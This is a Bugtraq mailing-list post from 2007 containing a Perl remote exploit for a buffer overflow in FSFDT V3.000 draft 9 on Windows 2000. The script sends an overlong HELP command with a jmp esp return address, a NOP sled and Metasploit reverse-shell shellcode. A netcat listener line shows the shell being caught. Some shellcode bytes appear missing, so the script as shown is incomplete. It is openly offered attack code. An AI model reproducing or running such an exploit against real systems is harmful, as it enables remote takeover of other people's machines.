[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Two buffer-overflow in FSD V2.052 d9 and FSFDT V3.000 d9[EXPLOIT]
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: Two buffer-overflow in FSD V2.052 d9 and FSFDT V3.000 d9[EXPLOIT]
- From: weak@xxxxxxxxxx
- Date: 4 Oct 2007 10:19:50 -0000
~$ nc -l -p 4321
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV < 1 )
print "usage: perl ".$0." <ip> <port>";
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto
=> 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
# win32_reverse - EXITFUNC=thread LHOST= LPORT=4321 Size=312
Encoder=PexFnstenvSub http://metasploit.com
# bad chars: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode =
print "sending payload...\n";
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" .
"\x90"x400 . $shellcode;
print "done.\n";